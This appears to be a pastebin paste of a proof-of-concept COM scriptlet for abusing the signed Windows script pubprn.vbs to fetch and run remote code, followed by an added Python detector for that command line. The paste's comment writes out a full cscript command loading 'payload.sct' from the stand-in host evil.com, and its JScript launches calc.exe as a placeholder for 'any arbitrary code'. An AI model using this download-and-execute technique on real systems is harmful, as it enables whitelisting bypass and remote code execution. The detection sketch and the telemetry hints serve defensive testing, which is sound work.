Untitled

a guest
Oct 16th, 2019
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->

<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extension does not matter -->
<!-- Though, the name and extension are arbitrary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

]]>
</script>
</registration>
</scriptlet>
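
Added example, not part of the original paste: a sketch of the command-line detection the script comment says to aim for, flagging pubprn.vbs invoked with a "script:" moniker and noting whether the scriptlet is remote or local. The event dictionaries are constructed samples using the Sysmon process-creation field names Image and CommandLine; the function names and the printsrv01 / example.test values are assumptions.

```python
import re

# "script:" moniker passed to pubprn.vbs; the lookbehind skips e.g. "javascript:".
MONIKER = re.compile(r'(?<![a-z0-9])script:\s*([^\s"]+)', re.IGNORECASE)
# A scriptlet fetched over HTTP(S) or from a UNC share counts as remote.
REMOTE = re.compile(r'^(?:https?://|\\\\)', re.IGNORECASE)


def detect(event):
    """Return a finding dict for a suspicious pubprn.vbs launch, else None."""
    cmd = event.get("CommandLine", "")
    if "pubprn.vbs" not in cmd.lower():
        return None
    match = MONIKER.search(cmd)
    if match is None:
        return None  # normal printer publishing passes an LDAP:// path instead
    target = match.group(1)
    return {
        "image": event.get("Image", ""),
        "target": target,
        "origin": "remote" if REMOTE.match(target) else "local",
    }


def scan(events):
    """Run detect() over a list of events and keep only the hits."""
    return [hit for hit in map(detect, events) if hit]


CSCRIPT = r"C:\Windows\System32\cscript.exe"
PUBPRN = r"C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs"

# Constructed process-creation events (not captured from a real host).
SAMPLE_EVENTS = [
    {"Image": CSCRIPT,  # the command line quoted in the paste
     "CommandLine": 'cscript.exe /b ' + PUBPRN
                    + ' localhost "script:http://evil.com/payload.sct"'},
    {"Image": CSCRIPT,  # benign: publishing a printer to a directory container
     "CommandLine": 'cscript.exe ' + PUBPRN
                    + ' printsrv01 "LDAP://CN=Printers,DC=example,DC=test"'},
    {"Image": CSCRIPT,  # upper-cased, unquoted, local scriptlet path
     "CommandLine": 'CSCRIPT.EXE /B ' + PUBPRN.upper()
                    + r' 127.0.0.1 SCRIPT:C:\Temp\file.sct'},
    {"Image": CSCRIPT,  # unrelated script, must not match
     "CommandLine": r"cscript.exe C:\scripts\inventory.vbs"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["origin"], hit["target"])
```

Command-line matching covers only the first of the three signals the comment lists; module loads and network connections from the script host need their own telemetry.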